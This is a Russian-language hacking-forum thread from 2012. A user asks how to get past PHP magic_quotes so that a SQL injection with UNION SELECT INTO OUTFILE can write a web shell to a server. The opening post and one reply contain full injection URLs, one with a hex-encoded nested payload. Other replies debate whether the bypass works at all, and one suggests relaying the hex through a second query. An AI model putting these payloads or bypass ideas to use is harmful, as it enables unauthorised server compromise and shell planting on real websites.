Как обойти magic_quotes в outfile mysql?

Discussion in 'Песочница' started by MrHunter, 27 Mar 2012.

  1. MrHunter

    MrHunter New Member

    Joined:
    9 Feb 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Всем привет. Столкнулся с такой проблемой. Хочу залить шелл, но на сайте включен magic_quotes. То есть выполнить такой запрос я не могу
    http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0X3C707
    ,null,null,null into outfile 'usr/local/apache/htdocs/webexploitation_package_02/
    cyphor/shell.php'
    Кто знает как решить проблему?
     
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Никак.
     
    _________________________
  3. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    твой запрос

    в него встраиваем внутренний запрос
    только в хексе
    и должно быть что то вроде
    http://site.com/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x2d3120756e696f6e2073656c6563742030583343373037202c6e756c6c2c6e756c6c2c6e756c6c20696e746f206f757466696c6520277573722f6c6f63616c2f6170616368652f6874646f63732f7765626578706c6f69746174696f6e5f7061636b6167655f30322f20637970686f722f7368656c6c2e706870,null,null,null--


    Вроде так можно
     
  4. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Аннет, всётаки так нельзя, вложенный запрос не обработается, т.к. это не предусмотрено исполняемым скриптом, если опираться на первый пост.
     
    _________________________
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Expl0ited это из-за хекса нельзя, который у него в первом посте? или изза "null"?
     
  6. MrHunter

    MrHunter New Member

    Joined:
    9 Feb 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    OxoTnik,не выходит. Когда делаю внутренний запрос (в хекс), то он воспринимается как строка, а не как запрос. Искал возможность через сохраненные процедуры, но тоже решения пока не нашел. Есть ли другие предложения?
     
  7. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Путь юзать в хексе нельзя.

    TC, ответ дали же. НИКАК.
     
    1 person likes this.
  8. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Можно обойти, при условие, что запрос передается через переменную в другой запрос.

    Точда кодируем в хекс и во втором запросе кавычки выполнятся нормально
     
Loading...
Similar Threads - обойти magic_quotes outfile
  1. Flashid
    Replies:
    3
    Views:
    2,475